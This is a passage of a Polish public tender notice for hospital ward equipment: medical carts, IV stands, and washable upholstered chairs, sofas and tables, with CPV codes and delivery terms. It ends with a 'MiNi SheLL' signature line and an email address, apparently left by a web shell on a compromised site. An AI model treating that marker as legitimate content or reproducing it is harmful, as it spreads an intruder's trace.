7.3.	Wymiary zewnętrzne wózka:
a). wysokość 90 cm +/-5cm
b). głębokość 72 cm +/-5cm
c). szerokość 83 cm +/-5cm
7.4.	Wózek wyposażony w:
a)	Trzy szuflady o wysokości 100mm
b)	Dwie szuflady o wysokości 150 mm
7.5.	Czoła szuflad z przezroczystymi pojemnikami z możliwością umieszczenia opisu identyfikującego zawartość szuflad. Pojemniki szuflad jednoczęściowe - odlane w formie bez elementów łączenia, bez miejsc narażonych na kumulację brudu i ognisk infekcji
7.6.	Układ jezdny wysoce mobilny: 4 koła jezdne, w tym 2 z blokadą o średnicy min. 65 mm, z elastycznym niebrudzącym podłóg bieżnikiem rozmieszczone w równych odległościach od siebie (kwadracie) zwiększające zawartość wózka lub system z piątym centralnie umiejscowionym kołem.
7.7.	Wyposażenie podstawowe wózka:
a). blat zabezpieczony przed zsuwaniem się przedmiotów
b).uchwyt do przetaczania
c). kosz na odpadki
d). co najmniej 2 przezroczyste umożliwiające identyfikację tego co znajduje się w środku odchylane pojemniki kieszenie
e). wysuwana spod blatu półka do pisania
f). półka na żel
g). uchwyt na butle z tlenem
h). zintegrowane dwie boczne szuflady wysuwane spod blatu: jedna z wkładem ze stali nierdzewnej, druga na leki natychmiastowego użycia - ratujące życie z przezroczystą ścianką pozwalające na ich identyfikację.
Wymienione wyposażenie nie powoduje zwiększenia gabarytów wózka i nie narażające na ich uszkodzenie - zintegrowane w budowie wózka
7.8.	Wyposażenie dodatkowe (wymagane wraz z dostawą)
a). wieszak kroplówki
b). półka na defibrylator
c). zasilanie elektryczne
d). dodatkowa półka na ssak
e). płyta do masażu serca
8.	WÓZEK FUNKCYJNY UŻYTKOWY - szt. 2
8.1.	Szkielet wózka, blat górny i szuflady wykonane z materiału charakteryzującego się wysoką wytrzymałością i twardością, stal nierdzewna lub tworzywo BAYDUR
8.2.	Konstrukcja wózka wyposażona w centralny system zamknięcia wszystkich szuflad - zamykany na klucz
8.3.	Wymiary zewnętrzne wózka:
a). wysokość 90 cm +/-5cm
b). głębokość 72 cm +/-5cm
c). szerokość 83 cm +/-5cm
8.4.	Wózek wyposażony w:
a)	Trzy szuflady o wysokości 100mm
b)	Dwie szuflady o wysokości 150 mm
8.5.	Czoła szuflad z przezroczystymi pojemnikami z możliwością umieszczenia opisu identyfikującego zawartość szuflad. Pojemniki szuflad jednoczęściowe - odlane w formie bez elementów łączenia, bez miejsc narażonych na kumulację brudu i ognisk infekcji
8.6.	Układ jezdny wysoce mobilny: 4 koła jezdne, w tym 2 z blokadą o średnicy min. 65 mm, z elastycznym niebrudzącym podłóg bieżnikiem rozmieszczone w równych odległościach od siebie (kwadracie) zwiększające zwrotność wózka lub system z piątym centralnie umiejscowionym kołem.
8.7.	Wyposażenie podstawowe wózka:
a). blat zabezpieczony przed zsuwaniem się przedmiotów
b).uchwyt do przetaczania
c). kosz na odpadki
Wymienione wyposażenie nie powoduje zwiększenia gabarytów wózka i nie narażające na ich uszkodzenie - zintegrowane w budowie wózka
9.	Statyw do kroplówek - szt. 10
9.1.	Kolumna statywu wykonana ze stali szlachetnej o regulowanej wysokości
9.2.	Krzyżak do butelek ze stali szlachetnej, 4 haki, obciążenie 2 kg na każdy hak
9.3.	Blokada ręcznego ustawienia wysokości statywu
9.4.	Stabilna podstawa, wyposażona w 5 kółek (w tym 2 z blokadą)
9.5.	Ciężar statywu max. 4 kg
9.6.	Gwarancja 24 m-ce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> meble tapicerowane stoliki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 meble tapicerowane, stoliki
1.	Przedmiot zamówienia stanowią meble tapicerowane i stoliki.
2.	Oferowany asortyment musi być odporny na środki myjąco-dezynfekujące przeznaczone do mebli medycznych (dotyczy mebli tapicerowanych i stolików)
3.	Okres pełnej gwarancji na 36 miesięcy. 
4.	Przed przystąpieniem do realizacji zamówienia należy dokonać inwentaryzacji pomieszczeń w celu ewentualnej korekty parametrów oraz szczegółowego określenia kolorystyki.
5.	Jakiekolwiek odstępstwa od podanych wymagań spowodują automatyczne odrzucenie oferty.
6.	Na widocznych elementach mebli pojedynczych należy nakleić silikonowe naklejki z danymi producenta oraz trwałe odporne na wilgoć i środki dezynfekcyjne naklejki o wymiarach ok. 9,5 cm (szerokość) x 3,5 cm (wysokość). Wzór naklejki zostanie przekazany Wykonawcy najpóźniej w dniu zawarcia umowy.
I.	Przykładowe meble
Krzesło tapicerowane - wzór nr 1
Tapicerka łatwo zmywalna
Stolik śniadaniowy drewniany o wym. 70x70cm - wzór nr 2
Sofa - wzór nr 3
Sofa o prostej lekkiej formie z podłokietnikami, metalowe nogi, tapicerka łatwo zmywalna, szer. 140cm
Stolik kawowy - wzór nr 4
Blat z płyty, nogi metalowe
II. Wykaz mebli tapicerowanych i stolików
L.p.	Asortyment 	Pomieszczenie 	Ilość w szt.
1	Krzesło obrotowe biurowe	- sekretariat
- gabinet ordynatora
- gabinet diagnostyczno-zabiegowy
- gabinet zabiegowy
- pokój pielęgniarki oddziałowej
- gabinet lekarski
- punkt pielęgniarski (odc. męski)
- punkt pielęgniarski (odc. kobiecy)
- sala intensywnego nadzoru	3
1
1
1
1
1
1
1
1
2	Krzesło tapicerowane  zmywalne (fotel), konstrukcja drewniana - 
wg wzoru nr 1	- gabinet ordynatora
- pokój pielęgniarki oddziałowej
- pokój socjalny (odc. Kobiecy)
- pokój socjalny (odc. Męski)
- sekretariat	4
2
2
2
2
3	Krzesło zmywalne PCV o konstrukcji metalowej	- gabinet diagnostyczno-zabiegowy
- gabinet zabiegowy
- punkt pielęgniarski (odc. Męski)
- punkt pielęgniarski (odc. Kobiecy)
- kuchnia
- sala intensywnego nadzoru	2
2
2
2
3
2
4	Taboret szpitalny siedzisko PCV, konstrukcja metalowa	- Sale chorych (w tym sala intensywnego nadzoru),
- Pro morte	58
2
5	Wersalka - tapicerka zmywalna 	- pokój lekarski
- pokój socjalny (odc. Kobiecy)
- pokój socjalny (odc. Męski)	1
1
1
6	Sofa - tapicerka zmywalna - wg wzoru nr 3	- hol	2
7	Stolik śniadaniowy - wg wzoru nr 2	- gabinet ordynatora
- pokój pielęgniarki oddziałowej
- pokój socjalny (odc. Kobiecy)
- pokój socjalny (odc. Męski)	1
1
1
1
8	Stolik kawowy - wg wzoru nr 4	- hol	2
9	Siedziska PCV konstrukcja metalowa - 1 zestaw z pięcioma siedziskami 	- korytarz	4 zestawy
UWAGA:
RYSUNKI DOTYCZĄCE ROZMIESZCZENIA POSZCZEGÓLNYCH MEBLI ZNAJDUJĄ SIĘ W ZAŁĄCZNIKACH DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5, 39.11.11.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com